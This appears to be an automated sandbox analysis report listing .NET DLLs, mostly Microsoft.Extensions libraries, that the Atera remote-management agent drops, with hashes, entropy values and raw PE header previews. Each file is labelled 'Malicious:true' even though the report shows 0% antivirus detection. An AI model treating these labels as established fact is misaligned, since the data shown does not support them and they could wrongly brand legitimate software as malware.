                                                                                                                                                                                                                                                                                                                                  SHA-512:FACD1F2678C7C027EBE4F8E67998271100E9C64850A562EDBECA2D367436B7F1DD28FBFD74E9F67B2BAF193647FB5F25A521DE4005A5538B3280AFF04EADBD06
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............" ..0..(...........G... ...`....... ..............................aj....`..................................G..O....`...............4..P(...........F..T............................................ ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............2..............@..B.................G......H........$...............B..@....F........................................(....*^.(.......(...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.428742326077994
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:wxddbVKFC/2DfTMFeuzpdUTVoIEu3GzN/EpYi60Mp:wNxxAYFeMpdURZEu3Su76fp
                                                                                                                                                                                                                                                                                                                                  MD5:791F90750E785D506B0C076BCF19AA33
                                                                                                                                                                                                                                                                                                                                  SHA1:AEB94ED12CA0D167F32E2E905F40B7E78DEA8F07
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D5F1EDEBE10A72D5D356BF1EDC1F470D44BB0E0DF32180B3BB548DBB47CC4FE
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF51C274D5405EA5789F9D63D86B71CBA0825BD313F82B7BAB7B400BC195FD63BF0774C15AF8FC5C8A46896CFC01048C46FDF78F9638D94D4125F33C23C08B25
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s..........." ..0..~..........&.... ........... ..............................hI....`....................................O.......p...............P(.............T............................................ ............... ..H............text...,|... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........;..(Y..................D.........................................("...*^.("......V...%...}....*:.(".....}....*:.(".....}....*:.(".....}....*:.(".....}....**.-..(....*..s#...z.~....*...0..........(....,..*..(.....o$......&...*.............. ....0...........(.......(%...-..,..*.*.(....,.r...p......%...%...(&...*..('...*.(....,.r...p......%...%...%...(&...*...((...*.(....,!r...p......%...%...%...%...(&...*....()...*..,&(....,..r...pr...p.(&...(*...*..(+...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):47184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.371206166099372
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:OkfEnkM0vRbJ05axPAONhO+JZIkp5ygv/MFyEpYi60D:bEkMoRxtzIk3ygv/Mh76m
                                                                                                                                                                                                                                                                                                                                  MD5:E57E8161BDA4CAF86195BE37E6A4F6FB
                                                                                                                                                                                                                                                                                                                                  SHA1:41F246C9F478113A4B19C71942AAC48254C8A998
                                                                                                                                                                                                                                                                                                                                  SHA-256:2517DD420CEA264C6F448B8630BE2788F6CCA63A4BDA26B26A2B7699723BFBAA
                                                                                                                                                                                                                                                                                                                                  SHA-512:97A9367922F29E938AFC19EE92B64A1FE64FAD31EF03467F1620DC77A933F573689DECAB20FB23689B076A9ED258B4CA8390B5880D6AF670A52009F0C2783039
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*..........." ..0.................. ........... ....................................`.................................k...O.......H...............P(..........d...T............................................ ............... ..H............text....... ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........D...X..............H............................................($...*^.($......@...%...}....*:.($.....}....*:.($.....}....*:.($.....}....*:.($.....}....**.-..(....*..s%...z.~....*...0..........(....,..*..(.....o&......&...*...................0...........(.......('...-..,..*.*.(....,.r...p......%...%...((...*..()...*.(....,.r...p......%...%...%...((...*...(*...*.(....,!r...p......%...%...%...%...((...*....(+...*..,&(....,..r...pr...p.((...(,...*..(-...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.46342996949096
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:iup+kjcS4GAF7ItpTYbg8lAZnsboXMEpYi60nD9:ii+YoF7Itmbg82sbo176I9
                                                                                                                                                                                                                                                                                                                                  MD5:7AA300B49285242D2F667485F375912B
                                                                                                                                                                                                                                                                                                                                  SHA1:6B243C398E0B7BDB55F8712FBC03946F3776D5AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:F23A75F7325549FEDAA3C17D2990465D067CAD0A0AD496060CFB9F67DF071250
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A8B6943CBF2DB3B9A393474EDBA5081435D6C5408CF26A55683A629906CE7FE271EB2960549D561D17C105DDA77E54A5CEB296DF3B045A753278B68A41E48DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kq..........." ..0..R...........p... ........... ...................................`.................................;p..O.......8............\..P(..........0o..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc...8............T..............@..@.reloc...............Z..............@..B................op......H.......</..,<..........hk..H....n........................................(....*^.(.......I...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.302263838381226
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:AyK1UG8tMAv0by0P/vGCnbr1hmiBPIIk+v76Zn:Aykl8tla/nbr1kiBx3vIn
                                                                                                                                                                                                                                                                                                                                  MD5:2B271F3BC6A5CFAB2D4FE0ABBB71C447
                                                                                                                                                                                                                                                                                                                                  SHA1:551FD1C702C831D9C2B0509F643C8165AD06D651
                                                                                                                                                                                                                                                                                                                                  SHA-256:6783ACC532F672BDCE9C3D952270E660CD078DD028EDC84B2E29C02263F2C988
                                                                                                                                                                                                                                                                                                                                  SHA-512:24A6990B633D5D610E537714DB07F13EAD685F6D27BABA08B2F1AD937B84630D0DFF2B94B39AB33E76E875F4759C6FDA0DF4CA7738D2BDB2493B5D7D91121ECE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*t............" ..0.................. ........... .......................@......]v....`.................................i...O.......................P(... ......x...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........R..l...........X.................................................(!...*^.(!......p...%...}....*:.(!.....}....*:.(!.....}....*:.(!.....}....*:.(!.....}....**.-..(....*..s"...z.~....*...0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.22406475067109
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:VLr8r9NCg8mFjk3dhgVFtkSxq65QXSzeueG9F2x9OgN8GHw+gaoyjcMiwy0J5rax:AsDE/e+9cxoZhNyjcMiJSAopUx+ZM76s
                                                                                                                                                                                                                                                                                                                                  MD5:CC87B27B92D91DD260E70E2CC6668BF5
                                                                                                                                                                                                                                                                                                                                  SHA1:1D1DE42ED85434F33A125EBAF9B1C0AFE7C46008
                                                                                                                                                                                                                                                                                                                                  SHA-256:D4CD472CDB05438538FB8C0EA584C6E4B348DE07AE7C8F51374244ED01ED1070
                                                                                                                                                                                                                                                                                                                                  SHA-512:C51FCB66964A2BC94DB8BB34534F378699CDB4008797DFCE40A069EDC8B7A40794BC26818E578A61C43039E710C63AE0AB9F51A1F8BAE507A3EFE3A96880BEC4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............" ..0.................. ........... .......................@............`.................................S...O....... ...............P(... ......`...T............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........T..............`.................................................(....*..(....*^.(.......\...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...( ...*..(!...*.(....,.r...p......%...%...%...( ...*...("...*.(....,!r...p......%...%...%...%...( ...*....(#...*..,&(....,..r...pr...p.( ...($...*..(%...*.*.(....,.r...p......%...%...( ...*...(&.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.28712413224749
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:F5PhAi33m3UOZsd4IZnuQDLtfjfCG76pa:jPhAi33mhZiHlvtbfCGOa
                                                                                                                                                                                                                                                                                                                                  MD5:2DAA379002B2F30DC9D6261945715900
                                                                                                                                                                                                                                                                                                                                  SHA1:7D58F57A9EB6320DC91F0CFF9A1798325B826162
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB899E77B933E4B7C7E9B31551D53EE3BBB88DF818F25947C9A38905543C4657
                                                                                                                                                                                                                                                                                                                                  SHA-512:701865D7BD2E04E3E994C9C98309FB8DDD671339E8C4436EFE973E6EA8768AC4643158A3DEA3A7CD53277855ECFBACF685C9DF026C61E3BF5542B06B4535111D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S............." ..0.................. ........... .......................@.......6....`.....................................O.......................P(... ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......PO..............X.................................................()...*^.()......N...%...}....*:.().....}....*:.().....}....*:.().....}....*:.().....}....**.-..(....*..s*...z.~....*...0..........(....,..*..(.....o+......&...*..............!....0...........(.......(,...-..,..*.*.(....,.r...p......%...%...(-...*..(....*.(....,.r...p......%...%...%...(-...*...(/...*.(....,!r...p......%...%...%...%...(-...*....(0...*..,&(....,..r...pr...p.(-...(1...*..(2...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.542622011812947
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:t1YBj07ZyQvkBd9aocTPMuiEjYpR6K698kwgcWWxseU7RWsXNyb8E9VF6IYijSJv:b4jUv6iT9jsi8HyeU7LbEpYi60lk
                                                                                                                                                                                                                                                                                                                                  MD5:B28E359EE304CF6DBBA9CA5246422B69
                                                                                                                                                                                                                                                                                                                                  SHA1:04FC5FFA0CA16BFA2D2FECCE995078B5C4FEB448
                                                                                                                                                                                                                                                                                                                                  SHA-256:4DA83B1CBD62CCCEEABFB09365052E5ED13D439D6D4283F22982F5D398EFA9CC
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9B9D46C7C89F011CF1E470BCE7DAF92DF30D104EC981679106C08083B3C7F8FD224A11D5E47006F100B75027EF493468CA7B5D1058B581243B2DEDC35F3706C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oe..........." ..0..<...........Z... ...`....... ..............................kx....`.................................1Z..O....`..L............F..P(..........$Y..T............................................ ............... ..H............text....:... ...<.................. ..`.rsrc...L....`.......>..............@..@.reloc...............D..............@..B................eZ......H........&..d...........\U..H....X........................................(....*^.(.......7...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..( ...*.(....,.r...p......%...%...%...(....*...(!...*.(....,!r...p......%...%...%...%...(....*....("...*..,&(....,..r...pr...p.(....(#...*..($...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332388893764591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Y7WAluzJ+Je2PS7kJFT+OUjz+Tf26auuPF1/krd6zkwQRIOIzb7E5EpYi60c:UJ4V26g1YuuP/2IOef769
                                                                                                                                                                                                                                                                                                                                  MD5:CA7E9273FEA2E670AB582C58B42B7A90
                                                                                                                                                                                                                                                                                                                                  SHA1:48F3ECCA9E62F6A2CE0DD92F3F2440EA6DCCA5F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:FB13003AD4EBF3925CA466E62D9AAD44B1D38D9C09EB20B2601AC9FA33DFBD6D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BEB11FD39A7BD9A8C9E06910BF98211F062F27ED9577A6F63B9C026A87F74AF09084B204D002B8EAFC5B6BBD2FE5DE6C4E07467C96375D6608D9AE8A02583B48
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0.............:.... ........... ....................... ......."....`.....................................O.......L...............P(..............T............................................ ............... ..H............text...@.... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........H..t...........l.......d.........................................()...*^.()......a...%...}....*:.().....}....*:.().....}....*:.().....}....*:.().....}....**.-..(....*..s*...z..0..l.........~..........(+...*(,........,.r...p(-.......+.r...p(-.....,..ry..p(....-..r}..p.o/...+..+....(0...........*.0..%.........~.......3.(....-..+..%............*F................*..0..<.......r...p..(1...,..*r...p(-.....,..ry..p(....-..r}..p.o/...*.*.*.~....*..0..........(....,..*..(....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21072
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656935038740096
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RzhlvlfTcbY3SCkWJOVMWskNyb8E9VF6IYijSJIVx2aJW5:LrfTcbY+uEEpYi60Tk
                                                                                                                                                                                                                                                                                                                                  MD5:17EBAD46ACFACD32DBBA0F1ACC2DD195
                                                                                                                                                                                                                                                                                                                                  SHA1:77F710A2DA2BD98EB10B2184AE0673F9ECF8B999
                                                                                                                                                                                                                                                                                                                                  SHA-256:6844D60CD6B19FB3A2264D8A95241DFA9C48D4CE47B83E7649FF972DD3FBD48D
                                                                                                                                                                                                                                                                                                                                  SHA-512:000CA0BCFABDA55780B94381224E07AB65FB96D84374C990F483BCE0C95A518B5EF3B9D303D1FDFDF4CF27C0E2F6CA1C6B74B2FE55D668277C345B3CD3582CB5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.}..........." ..0..............=... ...@....... ...............................t....`.................................-=..O....@..(............*..P(...`......0<..T............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@....... ..............@..@.reloc.......`.......(..............@..B................a=......H.......H"..h....................;........................................(....*^.(.......)...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*J.o....(...+(.....*..(....*.~....*.*.(....*.s.........*.~....*..(....*.*.s.........*:.(......}....*.(....*F(....,........*.*...0............(....-.*..r...p(.........o .....(!...,.*....("......(...+..r...p($

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.639454335428454
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:13WWQsE/8iqjnqHTnBdOHFgYVwOU3NW2qFWspUNyb8E9VF6IYijSJIVxUo0eVOm:13hQsE/8irTnfYFr/pUEpYi601np
                                                                                                                                                                                                                                                                                                                                  MD5:EBE39C37FCEA443029BF2179DF64A73D
                                                                                                                                                                                                                                                                                                                                  SHA1:3C671B89FC8D9D4E52EB628B47D46ADB4A4A7F98
                                                                                                                                                                                                                                                                                                                                  SHA-256:7ECCDC84DE7BD47081378C617E7CF781B058F3B1B3CD2E621E739DE972A14D01
                                                                                                                                                                                                                                                                                                                                  SHA-512:92C22F5ADAC8230571BDBB40B74DC9879E9928AD095E8DAC409BBDAB5B194A0B75CFF115E949702D061D1D8555B09E37ED4B611FF180DAF906CFA42F731F80EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Su..........." ..0..4...........S... ...`....... ..............................,.....`..................................S..O....`..`............>..P(...........R..T............................................ ............... ..H............text....3... ...4.................. ..`.rsrc...`....`.......6..............@..@.reloc...............<..............@..B.................S......H........'..T*.................. R........................................(....*^.(.......5...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*v.r...p(.....o....(...+(.....*..r...p(.....r...p(.....o.....s'...(...+(.....*..r#..p(.....(....&.o.....(...+&.*..("...*.~....*.*.(....*.s.........*.~....*..("...*.*.s.........*...0..x........("....r7..p(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575239674516702
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:+oi0m9/A58Ph+mJ5fvIK0ixTryfCWo/zKeGmquanccOB30RtWW3aUWs1Nyb8E9Vq:ODhbJ5nR02TQCWoJ92REpYi601mf
                                                                                                                                                                                                                                                                                                                                  MD5:1A2C139712D951658DAB36867E942BD3
                                                                                                                                                                                                                                                                                                                                  SHA1:0D7ACFA63C91B0C9B83F797DA0C7C0AAE5251C03
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A2A5C9AD7713ABA51F861757BB1F459BF3A8E874CF788BDC55B3ACA55D8983C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FD78942A4B86339E59634D1A73304F69FFFF8969EF9F590948139810498477099681C7B206DF1329C71D24A63E476DC00D90AF0029932FB9B37BC9A575F6516
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u............." ..0..X..........nw... ........... ...............................O....`..................................w..O....................b..P(...........v..T............................................ ............... ..H............text...tW... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B................Mw......H.......X0..8E...................u........................................("...*^.("......J...%...}....*:.(".....}....*:.(".....}....*:.(".....}....*:.(".....}....**.-..(....*..s#...z:.(".....}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.($.....}....*....0..+........{....oG......+......o%....o&.....X....i2.*:.($.....}....*2.{....oB...*..{....*..0..M........r...p(.....o'...~"...(...+.o'...(...+(*....o'...(...+(*....o'...(...+(*....*..($...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):48208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.411405702981899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+7d427HfKy1DQ+SKKKKzqPo6Zkn2qZKqLzZdd0UFxtEpYi60p7tHC:+7d42LfKy3SKKKKr8keqBdd0UFE76cHC
                                                                                                                                                                                                                                                                                                                                  MD5:CAB56D9CA8B6174BA8415F1E017C6AB8
                                                                                                                                                                                                                                                                                                                                  SHA1:B935B0ECF759C4E7F0C8C8E7D99B23C976E8DE9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:00D3DC43FB4BE5EB2B68752E5E54E0E182C213A9FC23DAFE5B5B5BBD073780A8
